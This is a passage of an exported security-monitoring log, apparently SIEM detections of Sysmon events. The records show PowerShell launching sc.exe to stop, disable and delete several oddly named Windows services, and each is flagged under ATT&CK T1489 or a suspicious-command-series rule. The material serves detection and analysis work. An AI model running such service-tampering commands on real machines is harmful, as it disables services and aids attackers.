Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.133"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-0010b0082100}"",""processId"":""1144"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Nationalmll Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.376",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.097 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-001018072100} +ProcessId: 5812 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationaloll +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationaloll",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.099269000Z"",""eventRecordID"":""2647"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.097\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-001018072100}\r\nProcessId: 5812\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationaloll\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.097"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-001018072100}"",""processId"":""5812"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationaloll"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.327",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.045 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-0010a2042100} +ProcessId: 832 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Natimmonal +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Natimmonal",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.048472000Z"",""eventRecordID"":""2644"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.045\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-0010a2042100}\r\nProcessId: 832\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Natimmonal\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.045"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-0010a2042100}"",""processId"":""832"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Natimmonal"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.290",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:27.993 +ProcessGuid: {df9fc3d3-b393-5ecf-0000-001090022100} +ProcessId: 2872 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete Nationaaal +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Nationaaal",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:27.996740400Z"",""eventRecordID"":""2642"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:27.993\r\nProcessGuid: {df9fc3d3-b393-5ecf-0000-001090022100}\r\nProcessId: 2872\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Nationaaal\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:27.993"",""processGuid"":""{df9fc3d3-b393-5ecf-0000-001090022100}"",""processId"":""2872"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Nationaaal"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.281",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:27.976 +ProcessGuid: {df9fc3d3-b393-5ecf-0000-0010b2012100} +ProcessId: 7724 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationaaal +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationaaal",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:27.978407400Z"",""eventRecordID"":""2641"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:27.976\r\nProcessGuid: {df9fc3d3-b393-5ecf-0000-0010b2012100}\r\nProcessId: 7724\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationaaal\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:27.976"",""processGuid"":""{df9fc3d3-b393-5ecf-0000-0010b2012100}"",""processId"":""7724"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationaaal"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.217",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:27.922 +ProcessGuid: {df9fc3d3-b393-5ecf-0000-001002ff2000} +ProcessId: 6524 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop National +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop National",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:27.924662700Z"",""eventRecordID"":""2638"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:27.922\r\nProcessGuid: {df9fc3d3-b393-5ecf-0000-001002ff2000}\r\nProcessId: 6524\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop National\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:27.922"",""processGuid"":""{df9fc3d3-b393-5ecf-0000-001002ff2000}"",""processId"":""6524"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop National"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.150",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:27.865 +ProcessGuid: {df9fc3d3-b393-5ecf-0000-00108bfc2000} +ProcessId: 3628 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Sougoudl +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Sougoudl",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:27.867997000Z"",""eventRecordID"":""2635"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:27.865\r\nProcessGuid: {df9fc3d3-b393-5ecf-0000-00108bfc2000}\r\nProcessId: 3628\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Sougoudl\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:27.865"",""processGuid"":""{df9fc3d3-b393-5ecf-0000-00108bfc2000}"",""processId"":""3628"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 